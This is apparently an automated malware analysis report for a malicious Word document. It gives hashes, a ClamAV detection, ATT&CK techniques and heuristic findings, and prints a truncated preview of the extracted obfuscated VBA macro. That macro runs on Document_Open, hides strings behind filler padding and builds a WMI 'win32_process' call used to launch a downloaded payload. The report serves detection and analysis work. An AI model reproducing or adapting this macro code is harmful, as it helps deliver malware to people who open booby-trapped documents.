Office (OLE) malware analysis — malicious · d220bbc8081710b4

MALICIOUS

Office (OLE)

192.5 KB Created: 2020-08-19 17:17:00 Authoring application: Microsoft Office Word First seen: 2020-09-07

MD5: 20f7ac4a8d0b5958a8fbc7137c0049b9 SHA-1: a92cbd54f03edf7b9a604a7576176f5e845383fb SHA-256: d220bbc8081710b4776297c19f586d5ea6353b14ae1b1dcc7819e1f969aead89

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_Open macro and a hidden-property command stager, indicating malicious intent. The presence of a ClamAV detection for 'Doc.Malware.Sagent-9401419-0' further confirms its malicious nature. The VBA code likely attempts to download and execute a secondary payload, a common technique for malware delivery.

Heuristics 7

ClamAV: Doc.Malware.Sagent-9401419-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Sagent-9401419-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15428 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15428 bytes
SHA-256: `06ef3089ae1eacf6fbae8a5da9610b79b11a2cfb9f3c91e8e9a2c84577794915`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Vg3ugxelvrlzed9hwz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub _ Document_open() Sf4dqd6iw65q.T7wnceflceber74 End Sub Attribute VB_Name = "Sf4dqd6iw65q" Attribute VB_Base = "0{48C75266-7CEB-4D4E-BA70-7FA9510850F9}{9B9F1939-CA22-4B47-8377-DEB12F5C17DE}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function T7wnceflceber74() Nrpfn1tngfbnfmdn8w = "637" If Len("Ynj91ucwnnyc7Uw59kn4au9elmu") = Len("Hk1e_luku1vkdf_tc") + 1 Then End If Len("Xn2jpxiu85l4Ft5dd908filkizS7upcfphba6") < Len("Wpo1_2ko3kb") Then MsgBox "Pek3eq_g9f6bj72j3m" + "Ci6cr3smt9lmp5y59" MsgBox ("Rcwayf1umrd_bwps9") MsgBox "Tb4awdrjx5qiwb5o" + "Ggdv1m8pbiu" End If If Len("S897_d8cyqsups8ee6Exsfm6dbz7v") = Len("W9m99smx08mq4yu") Then MsgBox "Fq4khhnkh2wb" + "Bhgc8xxdv_x4hdjkbn" MsgBox ("I05jdlnyub1g8l37 !!!") MsgBox "Eo8b8cwrgs_edago" + "S9i0c3t0cb641rqhud" End If Ld83k56umwr = Sf4dqd6iw65q.HelpContextId + 50 + 50 V0actu6res35x8e = "916" If Len("Wxk4xuazhyhbqzzf8nYt742gucwgn327le") = Len("P69j9l77n5b") + 1 Then End If Len("Ux8kfgq_6twcsoV8qfeuvtcprah_8Jtx4tqrvz6ekci") < Len("Tt5b_8z86id57zfia") Then MsgBox "Dju6v0op7qjqlr5u1r" + "Y9ryw4vqww8twe" MsgBox ("Y_k896xubiyp9") MsgBox "Zl0z6b_zv0cat450" + "Ql0t6j4tulopq9ny4w" End If If Len("Y63cmjpm69m61Hbd0dfbggl2") = Len("Geazm1gtac6jxkq") Then MsgBox "Yvhqymf8k11rj3zrl1" + "Hlgvwzhcig6l41divd" MsgBox ("Y90eoxazkjoo9 !!!") MsgBox "Hfw2aw3rk92qo83fte" + "A3cmh39w_8453" End If Zqe11tc7slxyfkwai = ChrW(Ld83k56umwr + (15)) O2ajj2cssr2 = "752" If Len("E9pqj11ry1fo75swgnS2otis1erwucp3m") = Len("Jonp3mlp6wxo") + 1 Then End If Len("Grme0bh3oh0uvjCy2wuvfh402op0zw6Sifh0q2er0ho7") < Len("Bqlh7b65djtf") Then MsgBox "Q351veh8b28z" + "Wpeg_pcvm_xs2" MsgBox ("M6e7y4idnxjxkzka1") MsgBox "Nvgq19kedxl4gi" + "H1b86j8c3bs8nfoll" End If If Len("G_fybfhwuzv4vA4_0id7gwtooha") = Len("Z1m_t9izyz71jzhr0q") Then MsgBox "Xvfqchocowj" + "Yhzu_j4bt4dmjmow" MsgBox ("Kcp9gem5kk4f76 !!!") MsgBox "Kb0sufhhgos" + "M5g143w0u51" End If Elj6thrnpk_98q8ja0 = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Zqe11tc7slxyfkwai + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Sf4dqd6iw65q.Sbicpimbs57oa9_ + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf" Bbr2wpasobsn = "45" If Len("Fq59zwdb56odgjcz0eAgeo2y85f_qe_tbdq") = Len("Jcereigdxpg95p8zn2") + 1 Then End If Len("Bcj440bo2ouDw4wbztb8hyaQhgahkgkao4djl") < Len("C6qzckala57a51g") Then MsgBox "Kjmf27ntdo6ei_s3n" + "Yb3_9gx7fhm" MsgBox ("Jv5uo69g3hs9v") MsgBox "L8damdx52fdplft6" + "Eg5bkkywy6gi2u5o" End If If Len("T24f7jxt5zr0Uy9sm23yfwqpyjq") = Len("Avjbdo3cvk9gsqw") Then MsgBox "Qectkjicxvwe" + "Shag05di9qo77" MsgBox ("A5vgzaj4ug9l3ngpt4 !!!") MsgBox "S6d8_uxs0zzzyplh" + "Bo8ed9y5jxc2" End If I7o9scg_fx0u5u = W6bxcb63rbrdfpvds5(Elj6thrnpk_98q8ja0) Uz1uet561r3n = "909" If Len("Bp6xg8w9nb85dw32e0Ub_p11e2svbn") = Len("K928ffpyshqx42b8c") + 1 Then End If Len(" ... (truncated)

SHA-256: 06ef3089ae1eacf6fbae8a5da9610b79b11a2cfb9f3c91e8e9a2c84577794915

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Vg3ugxelvrlzed9hwz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Sf4dqd6iw65q.T7wnceflceber74
End Sub


Attribute VB_Name = "Sf4dqd6iw65q"
Attribute VB_Base = "0{48C75266-7CEB-4D4E-BA70-7FA9510850F9}{9B9F1939-CA22-4B47-8377-DEB12F5C17DE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function T7wnceflceber74()
   Nrpfn1tngfbnfmdn8w = "637"
If Len("Ynj91ucwnnyc7Uw59kn4au9elmu") = Len("Hk1e_luku1vkdf_tc") + 1 Then End
If Len("Xn2jpxiu85l4Ft5dd908filkizS7upcfphba6") < Len("Wpo1_2ko3kb") Then
        MsgBox "Pek3eq_g9f6bj72j3m" + "Ci6cr3smt9lmp5y59"
        MsgBox ("Rcwayf1umrd_bwps9")
        MsgBox "Tb4awdrjx5qiwb5o" + "Ggdv1m8pbiu"
End If
If Len("S897_d8cyqsups8ee6Exsfm6dbz7v") = Len("W9m99smx08mq4yu") Then
       MsgBox "Fq4khhnkh2wb" + "Bhgc8xxdv_x4hdjkbn"
       MsgBox ("I05jdlnyub1g8l37 !!!")
       MsgBox "Eo8b8cwrgs_edago" + "S9i0c3t0cb641rqhud"
End If

Ld83k56umwr = Sf4dqd6iw65q.HelpContextId + 50 + 50
   V0actu6res35x8e = "916"
If Len("Wxk4xuazhyhbqzzf8nYt742gucwgn327le") = Len("P69j9l77n5b") + 1 Then End
If Len("Ux8kfgq_6twcsoV8qfeuvtcprah_8Jtx4tqrvz6ekci") < Len("Tt5b_8z86id57zfia") Then
        MsgBox "Dju6v0op7qjqlr5u1r" + "Y9ryw4vqww8twe"
        MsgBox ("Y_k896xubiyp9")
        MsgBox "Zl0z6b_zv0cat450" + "Ql0t6j4tulopq9ny4w"
End If
If Len("Y63cmjpm69m61Hbd0dfbggl2") = Len("Geazm1gtac6jxkq") Then
       MsgBox "Yvhqymf8k11rj3zrl1" + "Hlgvwzhcig6l41divd"
       MsgBox ("Y90eoxazkjoo9 !!!")
       MsgBox "Hfw2aw3rk92qo83fte" + "A3cmh39w_8453"
End If

Zqe11tc7slxyfkwai = ChrW(Ld83k56umwr + (15))
   O2ajj2cssr2 = "752"
If Len("E9pqj11ry1fo75swgnS2otis1erwucp3m") = Len("Jonp3mlp6wxo") + 1 Then End
If Len("Grme0bh3oh0uvjCy2wuvfh402op0zw6Sifh0q2er0ho7") < Len("Bqlh7b65djtf") Then
        MsgBox "Q351veh8b28z" + "Wpeg_pcvm_xs2"
        MsgBox ("M6e7y4idnxjxkzka1")
        MsgBox "Nvgq19kedxl4gi" + "H1b86j8c3bs8nfoll"
End If
If Len("G_fybfhwuzv4vA4_0id7gwtooha") = Len("Z1m_t9izyz71jzhr0q") Then
       MsgBox "Xvfqchocowj" + "Yhzu_j4bt4dmjmow"
       MsgBox ("Kcp9gem5kk4f76 !!!")
       MsgBox "Kb0sufhhgos" + "M5g143w0u51"
End If

Elj6thrnpk_98q8ja0 = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Zqe11tc7slxyfkwai + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Sf4dqd6iw65q.Sbicpimbs57oa9_ + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   Bbr2wpasobsn = "45"
If Len("Fq59zwdb56odgjcz0eAgeo2y85f_qe_tbdq") = Len("Jcereigdxpg95p8zn2") + 1 Then End
If Len("Bcj440bo2ouDw4wbztb8hyaQhgahkgkao4djl") < Len("C6qzckala57a51g") Then
        MsgBox "Kjmf27ntdo6ei_s3n" + "Yb3_9gx7fhm"
        MsgBox ("Jv5uo69g3hs9v")
        MsgBox "L8damdx52fdplft6" + "Eg5bkkywy6gi2u5o"
End If
If Len("T24f7jxt5zr0Uy9sm23yfwqpyjq") = Len("Avjbdo3cvk9gsqw") Then
       MsgBox "Qectkjicxvwe" + "Shag05di9qo77"
       MsgBox ("A5vgzaj4ug9l3ngpt4 !!!")
       MsgBox "S6d8_uxs0zzzyplh" + "Bo8ed9y5jxc2"
End If

I7o9scg_fx0u5u = W6bxcb63rbrdfpvds5(Elj6thrnpk_98q8ja0)
   Uz1uet561r3n = "909"
If Len("Bp6xg8w9nb85dw32e0Ub_p11e2svbn") = Len("K928ffpyshqx42b8c") + 1 Then End
If Len("
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.